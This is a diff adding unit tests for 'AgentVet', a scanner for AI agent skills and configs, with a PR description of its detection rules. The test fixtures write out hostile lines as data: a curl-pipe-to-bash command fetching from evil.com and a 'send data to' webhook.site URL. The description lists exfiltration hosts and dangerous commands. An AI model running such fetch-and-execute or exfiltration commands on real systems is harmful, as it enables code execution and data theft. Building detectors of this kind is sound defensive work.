+const fs = require('fs');
+const path = require('path');
+const os = require('os');
+
+const { scan } = require('../src/index.js');
+
+// Create temp directory for test files
+const tmpDir = path.join(os.tmpdir(), 'agentvet-test-' + Date.now());
+
+function setup() {
+  fs.mkdirSync(tmpDir, { recursive: true });
+}
+
+function cleanup() {
+  fs.rmSync(tmpDir, { recursive: true, force: true });
+}
+
+function writeTestFile(name, content) {
+  const filePath = path.join(tmpDir, name);
+  fs.writeFileSync(filePath, content);
+  return filePath;
+}
+
+describe('AgentVet Scanner', () => {
+  
+  test('should detect AWS access key', async () => {
+    setup();
+    try {
+      writeTestFile('config.js', 'const key = "AKIAIOSFODNN7EXAMPLE";');
+      const results = await scan(tmpDir, { checkPermissions: false });
+      
+      assert.ok(results.findings.length > 0, 'Should find at least one issue');
+      assert.ok(
+        results.findings.some(f => f.ruleId === 'credential-aws-key'),
+        'Should detect AWS key'
+      );
+    } finally {
+      cleanup();
+    }
+  });
+
+  test('should detect GitHub token', async () => {
+    setup();
+    try {
+      writeTestFile('script.js', 'const token = "ghp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx";');
+      const results = await scan(tmpDir, { checkPermissions: false });
+      
+      assert.ok(
+        results.findings.some(f => f.ruleId === 'credential-github-token'),
+        'Should detect GitHub token'
+      );
+    } finally {
+      cleanup();
+    }
+  });
+
+  test('should detect curl pipe to bash', async () => {
+    setup();
+    try {
+      writeTestFile('install.sh', 'curl -fsSL https://example.com/install.sh | bash');
+      const results = await scan(tmpDir, { checkPermissions: false });
+      
+      assert.ok(
+        results.findings.some(f => f.ruleId === 'command-curl-bash'),
+        'Should detect curl | bash'
+      );
+    } finally {
+      cleanup();
+    }
+  });
+
+  test('should detect webhook.site URL', async () => {
+    setup();
+    try {
+      writeTestFile('skill.md', 'Send data to https://webhook.site/abc-123-def');
+      const results = await scan(tmpDir, { checkPermissions: false });
+      
+      assert.ok(
+        results.findings.some(f => f.ruleId === 'url-webhook-site'),
+        'Should detect webhook.site'
+      );
+    } finally {
+      cleanup();
+    }
+  });
+
+  test('should detect ngrok URL', async () => {
+    setup();
+    try {
+      writeTestFile('config.json', '{"endpoint": "https://abc123.ngrok.io/api"}');
+      const results = await scan(tmpDir, { checkPermissions: false });
+      
+      assert.ok(
+        results.findings.some(f => f.ruleId === 'url-ngrok'),
+        'Should detect ngrok URL'
+      );
+    } finally {
+      cleanup();
+    }
+  });
+
+  test('should not flag clean files', async () => {
+    setup();
+    try {
+      writeTestFile('clean.js', `
+        const config = process.env.MY_CONFIG;
+        console.log('Hello, world!');
+        const x = 1 + 2;
+      `);
+      const results = await scan(tmpDir, { checkPermissions: false });
+      
+      assert.strictEqual(results.summary.critical, 0, 'Should have no critical issues');
+      assert.strictEqual(results.summary.warning, 0, 'Should have no warnings');
+    } finally {
+      cleanup();
+    }
+  });
+
+  test('should skip binary files', async () => {
+    setup();
+    try {
+      // Create a fake binary file with a suspicious pattern
+      writeTestFile('image.png', 'AKIAIOSFODNN7EXAMPLE');
+      const results = await scan(tmpDir, { checkPermissions: false });
+      
+      assert.strictEqual(
+        results.findings.filter(f => f.file.endsWith('.png')).length,
+        0,
+        'Should not scan binary files'
+      );
+    } finally {
+      cleanup();
+    }
+  });
+
+  test('should return correct summary counts', async () => {
+    setup();
+    try {
+      writeTestFile('mixed.js', `
+        const aws = "AKIAIOSFODNN7EXAMPLE";
+        const cmd = "curl https://evil.com | bash";
+        const hook = "https://webhook.site/test";
+      `);
+      const results = await scan(tmpDir, { checkPermissions: false });
+      
+      assert.ok(results.summary.total >= 3, 'Should count all findings');
+      assert.ok(results.summary.critical >= 2, 'Should have critical findings');
+    } finally {
+      cleanup();
+    }
+  });
+
+  test('should respect severity filter', async () => {
+    setup();
+    try {
+      writeTestFile('test.js', `
+        eval(\`code\`);  // warning
+        const x = "AKIAIOSFODNN7EXAMPLE";  // critical
+      `);
+      
+      const results = await scan(tmpDir, { severityFilter: 'critical', checkPermissions: false });
+      
+      assert.ok(
+        results.findings.every(f => f.severity === 'critical'),
+        'Should only include critical findings'
+      );
+    } finally {
+      cleanup();
+    }
+  });
+
+});


### PR DESCRIPTION
## 🛡️ AgentVet v0.1.0

Initial implementation of the security scanner for AI agent skills, configs, and MCP tools.

### Features

- **CLI with scan command**
  - `agentvet scan <path>` to scan directories/files
  - `--format json` for CI/CD integration
  - `--quiet` for summary only
  - `--fix` for auto-fixing permission issues
  - `--severity` to filter by severity level

- **Credential Detection**
  - AWS Access Keys
  - GitHub tokens (PAT, ghp_, gho_, etc.)
  - Slack tokens
  - OpenAI/Anthropic API keys
  - Notion tokens
  - Discord bot tokens
  - Generic API keys and secrets

- **Dangerous Command Detection**
  - `curl | bash` patterns
  - `rm -rf` with root/home paths
  - `eval()` and `exec()` with dynamic input
  - `chmod 777`
  - Python exec/compile patterns

- **Suspicious URL Detection**
  - webhook.site
  - ngrok
  - pastebin
  - requestbin
  - Burp Collaborator
  - Discord webhooks
  - Telegram bot APIs

- **Permission Checks**
  - Detects insecure permissions on sensitive files
  - Auto-fix option to set proper permissions (600)

### Project Structure

```
agentvet/
├── bin/agentvet.js        # CLI entry point
├── src/
│   ├── index.js           # API entry
│   ├── scanner.js         # Core scanning logic
│   ├── reporter.js        # Output formatting
│   └── rules/             # Modular detection rules
│       ├── credentials.js
│       ├── commands.js
│       ├── urls.js
│       └── permissions.js
├── test/
│   └── scanner.test.js    # Unit tests (9 passing)
├── package.json
├── LICENSE
└── .gitignore
```

### Testing

```bash
npm test  # 9 tests passing
```

### Usage Examples

```bash
# Basic scan
agentvet scan ./skills

# JSON output for CI
agentvet scan . --format json --output report.json

# Quick check
agentvet scan . --quiet

# Auto-fix permissions
agentvet scan . --fix
```

---
🦞 Built by Moltbot